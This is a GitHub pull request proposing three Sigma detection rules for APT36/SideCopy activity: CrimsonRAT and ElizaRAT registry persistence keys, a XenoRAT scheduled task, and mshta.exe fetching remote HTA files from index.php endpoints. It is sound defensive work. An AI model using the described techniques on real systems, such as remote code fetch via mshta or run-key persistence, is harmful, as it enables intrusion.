Add APT36/SideCopy detection rules: CrimsonRAT persistence, XenoRAT task, mshta index.php chain#6076
Open
Pyhroff wants to merge 1 commit into
Open
Conversation
Three new experimental rules covering Pakistan-linked APT36/SideCopy TTPs
with no prior Sigma coverage:
1. registry_set_apt36_sidecopy_persistence.yml
- Detects CrimsonRAT (\Software\CrimsonRAT), ElizaRAT
(\SYSTEM\ElizaRAT\Persistence), and CapraStart run key writes
- ATT&CK: T1547.001
2. proc_creation_win_apt_sidecopy_xenorat_schtask.yml
- Detects schtasks.exe creating the hardcoded XenoUpdateManager task
used to persist XenoRAT in Operation XENOFISCAL (June 2026)
- ATT&CK: T1053.005
3. proc_creation_win_apt_sidecopy_mshta_index_php.yml
- Detects mshta.exe fetching a remote HTA via an index.php endpoint,
SideCopy signature TTP documented since 2019 across multiple campaigns
- More specific than the existing generic mshta HTTP rule
- ATT&CK: T1218.005, T1566.001
References: Seqrite Operation XENOFISCAL (2026-06), Talos InSideCopy,
Hacker News APT36 cross-platform RAT campaigns (2026-02).
github-actions
Bot
added
Rules
Review Needed
![github-actions[bot]](https://avatars.githubusercontent.com/in/15368?s=60&v=4){kind=small}
Contributor
There was a problem hiding this comment.
Welcome @Pyhroff 👋
It looks like this is your first pull request on the Sigma rules repository!
Please make sure to read the SigmaHQ conventions to make sure your contribution is adhering to best practices and has all the necessary elements in place for a successful approval.
Thanks again, and welcome to the Sigma community! 😃
If you want to engage more with the community for official support, general discussions or announcements:
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
1 participant
Add this suggestion to a batch that can be applied as a single commit.This suggestion is invalid because no changes were made to the code.Suggestions cannot be applied while the pull request is closed.Suggestions cannot be applied while viewing a subset of changes.Only one suggestion per line can be applied in a batch.Add this suggestion to a batch that can be applied as a single commit.Applying suggestions on deleted lines is not supported.You must change the existing code in this line in order to create a valid suggestion.Outdated suggestions cannot be applied.This suggestion has been applied or marked resolved.Suggestions cannot be applied from pending reviews.Suggestions cannot be applied on multi-line comments.Suggestions cannot be applied while the pull request is queued to merge.Suggestion cannot be applied right now. Please check back later.
Summary
Three new
experimentalrules covering APT36 (Transparent Tribe) / SideCopy TTPs with no prior Sigma coverage. This Pakistan-linked threat cluster has been consistently targeting Indian and Afghan government/defence networks, with campaigns escalating through 2025–2026 (Operation XENOFISCAL, cross-platform RAT campaign).Rules added
registry_set_apt36_sidecopy_persistence.yml\Software\CrimsonRAT), ElizaRAT (\SYSTEM\ElizaRAT\Persistence), CapraStart run keyproc_creation_win_apt_sidecopy_xenorat_schtask.ymlschtasks.execreating the hardcodedXenoUpdateManagertask used to persist XenoRATproc_creation_win_apt_sidecopy_mshta_index_php.ymlmshta.exefetching a remote HTA via anindex.phpendpoint — SideCopy signature TTP since 2019Why these are not duplicates
proc_creation_win_mshta_http.ymldetects anyhttp:///https://URL in mshta commandlines. The new rule is more specific: it requiresindex.phpin the path, which is the hardcoded endpoint pattern SideCopy uses on compromised PHP servers and reduces analyst fatigue on generic mshta-HTTP noise.References
False positive notes
\Software\CrimsonRAT,\SYSTEM\ElizaRAT\Persistence, or\Run\CapraStart.